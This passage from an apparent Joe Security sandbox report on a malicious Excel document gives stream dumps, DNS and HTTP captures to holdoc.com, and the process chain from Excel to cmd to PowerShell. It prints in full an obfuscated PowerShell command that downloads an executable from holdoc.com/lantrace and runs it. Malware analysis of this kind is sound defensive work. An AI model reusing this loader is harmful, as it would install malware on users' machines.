General Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1 File Type: data Stream Size: 106 Entropy: 2.1837232906 Base64 Encoded: False Data ASCII: r U ...... ~ } ...... 1 ...... p ...... Data Raw: 72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff 03 00 00 09 e1 02 00 00 00 00 00 00 31 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 70 00 00 7f 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 548
General Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2 File Type: data Stream Size: 548 Entropy: 2.31128093652 Base64 Encoded: False Data ASCII: r U ...... 0 ...... + . 4 . . . 1 ...... a ...... Y ...... ` ...... Data Raw: 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 b9 05 00 00 00 00 00 00 e1 05 00 00 00 00 00 00 09 06 00 00 00 00 00 00 ff ff ff ff 91 05 00 00 00 00 00 00 08 00 2b 00 34 00 00 00 31 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 59 06
Copyright Joe Security LLC 2018 Page 18 of 23 Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 481
General Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3 File Type: data Stream Size: 481 Entropy: 2.76254679194 Base64 Encoded: False Data ASCII: r U ...... @ . . . . . $ ...... ` ...... ( . A ...... ` ...... / ( ...... ` ...... / ( ...... ` . . ! ...... / ( ...... ` . . % ...... Data Raw: 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 03 60 00 00 15 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 28 00 41 01 00 00 00 00 02 00 01 00 03 60 04 01 19 04 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 524
General Stream Path: _VBA_PROJECT_CUR/VBA/dir File Type: data Stream Size: 524 Entropy: 6.33160018738 Base64 Encoded: True Data ASCII: ...... 0 * . . . . . p . . H . . . . . d ...... V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r ...... * . c \\ . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C ...... 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E ...... E . 2 D F 8 D 0 4 C . - Data Raw: 01 08 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 2a e1 63 5c 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
Network Behavior
Network Port Distribution
Total Packets: 14 • 80 (HTTP) • 53 (DNS)
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP Feb 23, 2018 01:31:46.217499971 CET 56842 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:31:47.213018894 CET 56842 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:31:47.299452066 CET 53 56842 8.8.8.8 192.168.2.2 Feb 23, 2018 01:31:47.321384907 CET 49163 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:31:47.321408033 CET 80 49163 92.53.78.250 192.168.2.2 Feb 23, 2018 01:31:47.321466923 CET 49163 80 192.168.2.2 92.53.78.250
Copyright Joe Security LLC 2018 Page 19 of 23 Timestamp Source Port Dest Port Source IP Dest IP Feb 23, 2018 01:31:47.321856976 CET 49163 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:31:47.321868896 CET 80 49163 92.53.78.250 192.168.2.2 Feb 23, 2018 01:31:47.851967096 CET 53 56842 8.8.8.8 192.168.2.2 Feb 23, 2018 01:33:26.202478886 CET 49163 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:33:26.202632904 CET 80 49163 92.53.78.250 192.168.2.2 Feb 23, 2018 01:33:26.202733040 CET 49163 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:33:26.562745094 CET 53440 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:33:26.652406931 CET 53 53440 8.8.8.8 192.168.2.2 Feb 23, 2018 01:33:26.654766083 CET 49164 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:33:26.654820919 CET 80 49164 92.53.78.250 192.168.2.2 Feb 23, 2018 01:33:26.655200005 CET 49164 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:33:26.655917883 CET 49164 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:33:26.655945063 CET 80 49164 92.53.78.250 192.168.2.2
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP Feb 23, 2018 01:31:46.217499971 CET 56842 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:31:47.213018894 CET 56842 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:31:47.299452066 CET 53 56842 8.8.8.8 192.168.2.2 Feb 23, 2018 01:31:47.851967096 CET 53 56842 8.8.8.8 192.168.2.2 Feb 23, 2018 01:33:26.562745094 CET 53440 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:33:26.652406931 CET 53 53440 8.8.8.8 192.168.2.2
ICMP Packets
Timestamp Source IP Dest IP Checksum Code Type Feb 23, 2018 01:31:47.852212906 CET 192.168.2.2 8.8.8.8 cffc (Port Destination unreachable) Unreachable
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Feb 23, 2018 01:31:46.217499971 CET 192.168.2.2 8.8.8.8 0x2320 Standard query holdoc.com A (IP address) IN (0x0001) (0) Feb 23, 2018 01:31:47.213018894 CET 192.168.2.2 8.8.8.8 0x2320 Standard query holdoc.com A (IP address) IN (0x0001) (0) Feb 23, 2018 01:33:26.562745094 CET 192.168.2.2 8.8.8.8 0x61b2 Standard query holdoc.com A (IP address) IN (0x0001) (0)
DNS Answers
Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class Feb 23, 2018 8.8.8.8 192.168.2.2 0x2320 No error (0) holdoc.com 92.53.78.250 A (IP address) IN (0x0001) 01:31:47.299452066 CET Feb 23, 2018 8.8.8.8 192.168.2.2 0x2320 No error (0) holdoc.com 92.53.78.250 A (IP address) IN (0x0001) 01:31:47.851967096 CET Feb 23, 2018 8.8.8.8 192.168.2.2 0x61b2 No error (0) holdoc.com 92.53.78.250 A (IP address) IN (0x0001) 01:33:26.652406931 CET
HTTP Request Dependency Graph
holdoc.com
HTTP Packets
Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.2 49163 92.53.78.250 80 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
kBytes Timestamp transferred Direction Data Feb 23, 2018 0 OUT GET /lantrace HTTP/1.1 01:31:47.321856976 CET Host: holdoc.com Connection: Keep-Alive
Copyright Joe Security LLC 2018 Page 20 of 23 Session ID Source IP Source Port Destination IP Destination Port Process 1 192.168.2.2 49164 92.53.78.250 80 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
kBytes Timestamp transferred Direction Data Feb 23, 2018 1 OUT GET /lantrace HTTP/1.1 01:33:26.655917883 CET Host: holdoc.com Connection: Keep-Alive
Code Manipulations
Statistics
Behavior
• EXCEL.EXE • cmd.exe • powershell.exe
Click to jump to process
System Behavior
Analysis Process: EXCEL.EXE PID: 3268 Parent PID: 2948
General
Start time: 01:31:48 Start date: 23/02/2018 Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Wow64 process (32bit): false Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde Imagebase: 0x2f310000 File size: 20392608 bytes MD5 hash: 716335EDBB91DA84FC102425BFDA957E Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
File Activities
Copyright Joe Security LLC 2018 Page 21 of 23 Source File Path Access Attributes Options Completion Count Address Symbol
Source File Path Completion Count Address Symbol
Source Old File Path New File Path Completion Count Address Symbol
Source File Path Offset Length Value Ascii Completion Count Address Symbol
Registry Activities
Key Created
Source Key Path Completion Count Address Symbol HKEY_USERS\Software\Microsoft\VBA success or wait 1 60A4AC61 RegCreateKeyExA HKEY_USERS\Software\Microsoft\VBA\7.0 success or wait 1 60A4AC61 RegCreateKeyExA HKEY_USERS\Software\Microsoft\VBA\7.0\Common success or wait 1 60A4AC61 RegCreateKeyExA
Source Key Path Name Type Data Completion Count Address Symbol
Source Key Path Name Type Old Data New Data Completion Count Address Symbol
Analysis Process: cmd.exe PID: 3348 Parent PID: 3268
General
Start time: 01:31:51 Start date: 23/02/2018 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: cMd /c'poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'd o{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2}{4}\' -f't','syst','.webclie','em','nt','. ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','%temp%.exe')}while(!$?);&(\'{0} {2}{1}\'-f'star','ss','t-proce') '%localappdata%.exe''' Imagebase: 0x49de0000 File size: 302592 bytes MD5 hash: AD7B9C14083B52BC532FBA5948342B98 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high
Analysis Process: powershell.exe PID: 3376 Parent PID: 3348
General
Start time: 01:31:52 Start date: 23/02/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25; (.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'n loadfil'+'e').Invoke('http://holdoc.com/lantrace','C:\Users\HERBBL~1\AppData\Local\Temp.ex e')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') 'C:\Users\user\AppData\Local.exe'' Imagebase: 0x22820000 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: moderate
Copyright Joe Security LLC 2018 Page 22 of 23 File Activities
File Created
Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Temp.exe read attributes none synchronous io success or wait 1 181066F CreateFileW and synchronize non alert and n and generic on directory file write and open no recall C:\Users\user\AppData\Local\Temp.exe read attributes none synchronous io success or wait 1 181066F CreateFileW and synchronize non alert and n and generic on directory file write and open no recall
File Deleted
Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Temp.exe success or wait 1 181006E DeleteFileW
Source Old File Path New File Path Completion Count Address Symbol
Source File Path Offset Length Value Ascii Completion Count Address Symbol
Registry Activities
Source Key Path Completion Count Address Symbol
Source Key Path Name Type Data Completion Count Address Symbol
Disassembly
Code Analysis
Copyright Joe Security LLC 2018 Page 23 of 23